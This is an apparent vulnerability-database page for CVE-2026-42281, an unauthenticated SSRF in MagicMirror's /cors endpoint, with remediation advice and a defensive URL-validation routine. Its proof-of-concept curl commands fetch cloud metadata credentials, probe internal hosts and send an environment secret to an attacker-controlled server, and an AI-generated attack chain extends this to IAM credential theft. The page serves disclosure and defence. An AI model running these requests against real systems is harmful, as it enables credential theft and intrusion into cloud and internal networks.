
MagicMirror CVE-2026-42281

EUVD-2026-30313 · CRITICAL
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-05 · https://github.com/MagicMirrorOrg/MagicMirror · GHSA-ph6f-2cvq-79hq
CVSS 4.0 score 9.2 (GitHub Advisory)

Severity by source

GitHub Advisory PRIMARY
9.2 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory), broken down from the vector string above:

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: X (not defined)

Lifecycle Timeline

CVSS changed: May 14, 2026, 16:22 (NVD): 9.2 (CRITICAL)
Source Code Evidence Fetched: May 05, 2026, 21:32 (vuln.today)
Analysis Generated: May 05, 2026, 21:32 (vuln.today)

Description (GitHub Advisory)

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders of the form **VAR_NAME**, enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:

  • No authentication required
  • No URL validation or blocklist for private/reserved IP ranges
  • No restriction on URL scheme or destination
  • Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF: access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Analysis (AI-generated)

Unauthenticated SSRF in MagicMirror ≤2.35.0 allows remote attackers to proxy arbitrary HTTP requests through the server, accessing cloud metadata services (AWS/GCP/Azure IMDSv1), internal network resources, and localhost services via the unrestricted /cors endpoint. The vulnerability is compounded by environment variable expansion: attackers can exfiltrate server-side secrets (API keys, database credentials) by embedding placeholders like **SECRET_API_KEY** in URLs, which the server resolves from process.env before making the request. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Network access to port 8080
Delivery: Send GET /cors?url=http://169.254.169.254/latest/meta-data/
Exploit: Server fetches cloud metadata
Execution: Retrieve IAM credentials from response
Persist: Authenticate to AWS API with stolen credentials
Impact: Exfiltrate S3 data or launch malicious instances

Vulnerability Assessment (AI-generated)

Exploitation: No special conditions; remote unauthenticated exploitation against default configurations of MagicMirror ≤2.35.0. …
Risk Assessment: Real-world risk is HIGH for cloud-hosted and LAN-exposed deployments, despite absence of CVSS score or EPSS data. …
Exploit Scenario: An attacker on the same LAN as a home MagicMirror deployment (or scanning the internet for exposed port 8080 instances) sends a crafted HTTP request to exfiltrate AWS credentials. They first probe `http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/` to list available IAM roles, then retrieve temporary credentials via `http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>`. …
Remediation: Upgrade immediately to MagicMirror version 2.36.0 or later (released via https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0), which disables the CORS proxy by default and implements IP blocklisting and DNS rebinding protections when explicitly re-enabled. …
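The Key issues listed under Details and the IP blocklisting and DNS-rebinding protections named in the Remediation above, worked into one target-validation routine a /cors-style proxy would run before calling fetch(). This is an added example, not MagicMirror's own code; the function names, the blocked ranges, the `.internal` suffix rule and the secret-host allowlist parameter are my assumptions, and it goes beyond the advisory by also catching hex/octal IPv4 literals and IPv4-mapped IPv6 addresses.

```javascript
// Added example, not MagicMirror's own code: checks a /cors-style proxy should run before fetch.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const SECRET_PLACEHOLDER = /\*\*[A-Z0-9_]+\*\*/; // the **VAR_NAME** form from the advisory

// Dotted-quad IPv4 to an unsigned 32-bit number, or null if the string is not one.
function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const p = m.slice(1).map(Number);
  return p.some((n) => n > 255) ? null : ((p[0] << 24) >>> 0) + (p[1] << 16) + (p[2] << 8) + p[3];
}
// Never reachable by a server-side fetch: "this" network, RFC 1918, CGNAT, loopback,
// link-local (covers 169.254.169.254 and 169.254.170.2), multicast and reserved space.
const BLOCKED_V4 = [["0.0.0.0", 8], ["10.0.0.0", 8], ["100.64.0.0", 10], ["127.0.0.0", 8],
  ["169.254.0.0", 16], ["172.16.0.0", 12], ["192.168.0.0", 16], ["224.0.0.0", 3]];

function isBlockedAddress(addr) {
  const a = addr.toLowerCase().replace(/^\[|\]$/g, "");
  // IPv4-mapped IPv6 (::ffff:7f00:1 or ::ffff:127.0.0.1) is still an IPv4 destination.
  const mapped = /^::ffff:(?:([0-9a-f]{1,4}):([0-9a-f]{1,4})|(\d+\.\d+\.\d+\.\d+))$/.exec(a);
  const v4 = !mapped ? ipv4ToInt(a)
    : mapped[3] ? ipv4ToInt(mapped[3]) : parseInt(mapped[1], 16) * 65536 + parseInt(mapped[2], 16);
  if (v4 !== null) {
    return BLOCKED_V4.some(([net, bits]) => {
      const mask = (~0 << (32 - bits)) >>> 0;
      return ((v4 & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
    });
  }
  // Native IPv6: unspecified, loopback, unique-local fc00::/7, link-local fe80::/10.
  return a === "::" || a === "::1" || /^f[cd]/.test(a) || /^fe[89ab]/.test(a);
}

// `resolved` is what the caller already got from DNS for the hostname (injected so this runs
// offline). Connect to the returned pinnedAddress instead of resolving again, or a rebinding
// name can pass this check and resolve to something else at fetch time.
function checkProxyTarget(urlString, resolved = [], secretHostAllowlist = []) {
  let url;
  try { url = new URL(urlString); } catch { return { ok: false, reason: "unparseable URL" }; }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return { ok: false, reason: "scheme not allowed" };
  if (url.username || url.password) return { ok: false, reason: "credentials in URL" };
  // URL has already normalised 0x7f000001, 2130706433 and 0177.0.0.1 to 127.0.0.1 for us.
  const host = url.hostname.replace(/^\[|\]$/g, "");
  if (host === "localhost" || host.endsWith(".internal")) return { ok: false, reason: "internal host" };
  const addrs = ipv4ToInt(host) !== null || host.includes(":") ? [host] : resolved;
  if (addrs.length === 0) return { ok: false, reason: "hostname did not resolve" };
  const bad = addrs.find(isBlockedAddress);
  if (bad) return { ok: false, reason: `destination ${bad} is in a blocked range` };
  // **VAR_NAME** expansion leaks process.env, so permit it only toward operator-listed hosts.
  if (SECRET_PLACEHOLDER.test(urlString) && !secretHostAllowlist.includes(host)) return { ok: false, reason: "secret placeholder for non-allowlisted host" };
  return { ok: true, reason: "", pinnedAddress: addrs[0] };
}
```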

Recommended Action (AI-generated)

Within 24 hours: Immediately isolate or disable all MagicMirror instances running version 2.35.0 or earlier, or restrict network egress to prevent access to cloud metadata services (169.254.169.254, metadata.google.internal, 169.254.170.2) and internal network ranges. …


CVE-2026-42281 vulnerability details – vuln.today
